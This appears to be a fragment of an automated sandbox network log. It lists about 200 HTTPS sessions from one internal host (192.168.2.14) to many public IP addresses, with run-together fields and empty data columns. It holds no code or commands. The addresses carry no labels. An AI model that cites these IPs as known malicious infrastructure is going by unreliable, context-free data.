                                                        19463192.168.2.1453958129.52.210.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19464192.168.2.143357020.122.56.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19465192.168.2.1438136151.159.28.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19466192.168.2.1459984154.238.40.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19467192.168.2.145973475.125.48.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19468192.168.2.1458678181.134.3.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19469192.168.2.14399769.206.180.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19470192.168.2.143445258.222.152.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19471192.168.2.1459518208.111.100.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19472192.168.2.1451938101.223.2.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19473192.168.2.144106261.4.72.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19474192.168.2.144696023.110.33.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19475192.168.2.1434572122.181.171.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19476192.168.2.143576039.178.8.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19477192.168.2.1441178222.129.155.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19478192.168.2.1441074202.198.127.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19479192.168.2.1459488110.162.33.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19480192.168.2.145982638.19.48.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19481192.168.2.1450514114.90.235.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19482192.168.2.1456346152.63.151.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19483192.168.2.145785679.33.208.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19484192.168.2.144331638.109.181.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19485192.168.2.143501651.86.87.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19486192.168.2.144709823.97.112.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19487192.168.2.1455398219.235.156.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19488192.168.2.1452278112.251.131.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19489192.168.2.1452414213.31.206.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19490192.168.2.14562521.34.50.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19491192.168.2.1440576172.36.80.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19492192.168.2.145959892.37.135.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19493192.168.2.1444478164.50.215.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19494192.168.2.143337275.41.219.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19495192.168.2.143552495.172.60.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19496192.168.2.14361824.128.40.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19497192.168.2.1458260154.224.163.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19498192.168.2.1446116218.150.54.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19499192.168.2.14549505.40.84.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19500192.168.2.144688043.15.197.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19501192.168.2.1442240103.191.229.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19502192.168.2.1441440167.226.78.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19503192.168.2.143801643.108.211.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19504192.168.2.145269634.217.92.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19505192.168.2.145242471.130.248.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19506192.168.2.1441096208.46.35.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19507192.168.2.143642839.212.185.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19508192.168.2.1450322108.170.83.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19509192.168.2.1458728213.118.58.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19510192.168.2.143599044.232.182.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19511192.168.2.144613488.122.141.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19512192.168.2.1438456167.59.185.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19513192.168.2.1441566131.123.23.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19514192.168.2.145316420.32.92.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19515192.168.2.145435442.106.7.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19516192.168.2.145083862.33.162.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19517192.168.2.1436422136.160.244.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19518192.168.2.145493641.226.22.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19519192.168.2.144479449.43.3.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19520192.168.2.1449404204.193.206.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19521192.168.2.144698662.241.80.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19522192.168.2.1457032106.35.47.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19523192.168.2.1432862202.47.217.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19524192.168.2.144846868.31.141.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19525192.168.2.1445508194.49.103.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19526192.168.2.1444650146.68.146.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19527192.168.2.143468283.124.46.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19528192.168.2.1439340116.150.1.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19529192.168.2.1444872167.186.109.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19530192.168.2.1443338111.169.203.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19531192.168.2.1440350190.4.201.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19532192.168.2.1437836123.94.3.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19533192.168.2.1438164139.205.209.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19534192.168.2.145409254.6.50.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19535192.168.2.1451596222.111.6.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19536192.168.2.1445244115.128.33.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19537192.168.2.1460314122.210.74.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19538192.168.2.145205898.62.36.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19539192.168.2.144988841.153.9.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19540192.168.2.143394836.139.225.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19541192.168.2.1440414192.153.70.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19542192.168.2.1436826165.159.19.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19543192.168.2.145714417.87.112.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19544192.168.2.143786889.130.117.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19545192.168.2.145130459.99.187.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19546192.168.2.143916892.186.75.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19547192.168.2.143537632.17.247.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19548192.168.2.145617690.164.85.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19549192.168.2.1440036102.42.120.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19550192.168.2.1445674186.50.38.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19551192.168.2.1444938162.76.1.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19552192.168.2.145942839.202.143.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19553192.168.2.1460188129.47.80.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19554192.168.2.1454682186.210.134.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19555192.168.2.145994448.32.194.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19556192.168.2.145768676.25.233.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19557192.168.2.1437576135.247.27.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19558192.168.2.1455220143.240.151.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19559192.168.2.144820295.150.212.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19560192.168.2.1453860148.221.62.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19561192.168.2.1457170197.85.127.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19562192.168.2.1438310112.130.127.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19563192.168.2.1453428125.47.225.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19564192.168.2.1438640180.199.66.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19565192.168.2.143825490.199.108.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19566192.168.2.143601691.119.69.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19567192.168.2.1453834167.183.147.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19568192.168.2.1458660174.164.121.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19569192.168.2.1450868166.244.148.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19570192.168.2.1458530145.187.82.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19571192.168.2.145786440.57.20.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19572192.168.2.1441390119.61.247.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19573192.168.2.1436774173.79.219.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19574192.168.2.1439532150.227.70.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19575192.168.2.145996093.85.41.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19576192.168.2.145771459.165.136.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19577192.168.2.1436554210.211.210.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19578192.168.2.1434176105.145.222.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19579192.168.2.1436262206.49.24.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19580192.168.2.1441194193.134.42.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19581192.168.2.144126283.182.73.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19582192.168.2.1448376149.70.46.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19583192.168.2.1444516142.172.188.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19584192.168.2.143388481.86.174.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19585192.168.2.14471425.150.188.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19586192.168.2.1440718209.175.173.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19587192.168.2.1446982158.208.182.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19588192.168.2.1446400213.25.146.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19589192.168.2.143290038.180.119.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19590192.168.2.143748868.77.115.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19591192.168.2.1440786180.182.235.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19592192.168.2.144713688.132.70.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19593192.168.2.1446506117.216.95.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19594192.168.2.1442236102.219.43.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19595192.168.2.145601664.140.83.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19596192.168.2.1456368156.222.99.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19597192.168.2.1442504141.244.224.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19598192.168.2.1436238208.132.23.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19599192.168.2.1438268179.90.106.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19600192.168.2.1460754140.128.186.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19601192.168.2.1455278211.99.223.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19602192.168.2.143732237.131.164.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19603192.168.2.1457456120.6.67.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19604192.168.2.1453766108.208.168.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19605192.168.2.1445712109.178.242.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19606192.168.2.1433738211.88.201.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19607192.168.2.1447366133.20.166.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19608192.168.2.145659668.228.127.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19609192.168.2.1454792208.35.98.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19610192.168.2.1454136103.204.144.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19611192.168.2.1440388185.121.219.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19612192.168.2.1449682212.237.68.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19613192.168.2.1450920122.0.169.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19614192.168.2.14485064.130.242.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19615192.168.2.1434408152.60.111.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19616192.168.2.143760443.23.227.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19617192.168.2.1451822167.1.202.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19618192.168.2.143929047.14.69.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19619192.168.2.1436114206.139.62.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19620192.168.2.1454784131.198.226.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19621192.168.2.143787464.78.116.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19622192.168.2.1440784105.102.159.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19623192.168.2.1451494145.65.209.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19624192.168.2.1440862200.13.87.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19625192.168.2.1443328185.180.247.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19626192.168.2.145939060.38.30.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19627192.168.2.1435302157.217.56.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19628192.168.2.143978237.85.70.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19629192.168.2.144460220.238.7.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19630192.168.2.145073883.98.203.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19631192.168.2.144818658.226.255.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19632192.168.2.1448442142.247.45.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19633192.168.2.145043852.129.181.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19634192.168.2.145494696.94.189.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19635192.168.2.145934234.113.135.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19636192.168.2.143505274.239.57.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19637192.168.2.145878217.206.10.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19638192.168.2.144461649.162.81.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19639192.168.2.1458298148.60.83.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19640192.168.2.143715864.98.138.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19641192.168.2.1454006198.95.211.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19642192.168.2.144491034.88.104.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19643192.168.2.1456640110.98.36.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19644192.168.2.145750639.76.172.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19645192.168.2.1446914220.202.9.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19646192.168.2.14479522.73.46.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19647192.168.2.143597474.255.91.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19648192.168.2.144437832.242.133.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19649192.168.2.143364240.53.88.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19650192.168.2.1436454222.22.139.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19651192.168.2.144582417.97.164.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19652192.168.2.1433578197.180.204.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19653192.168.2.1455966148.40.60.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19654192.168.2.1443606118.178.209.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19655192.168.2.145394637.158.12.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19656192.168.2.1434824134.102.53.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19657192.168.2.1454938105.59.73.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19658192.168.2.1444620211.13.0.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19659192.168.2.1434980166.209.25.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19660192.168.2.144056695.55.245.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19661192.168.2.14579748.6.133.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19662192.168.2.1455064115.47.254.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19663192.168.2.144138243.136.3.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19664192.168.2.1458898121.47.188.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19665192.168.2.144142663.200.94.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19666192.168.2.145783880.75.83.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19667192.168.2.1433924148.245.238.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19668192.168.2.1453756117.143.28.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19669192.168.2.1436728152.9.51.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19670192.168.2.144972841.181.137.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19671192.168.2.1437390180.15.79.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19672192.168.2.144132094.21.255.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19673192.168.2.1451906115.168.238.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19674192.168.2.1455532124.197.225.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19675192.168.2.144956251.130.152.50443
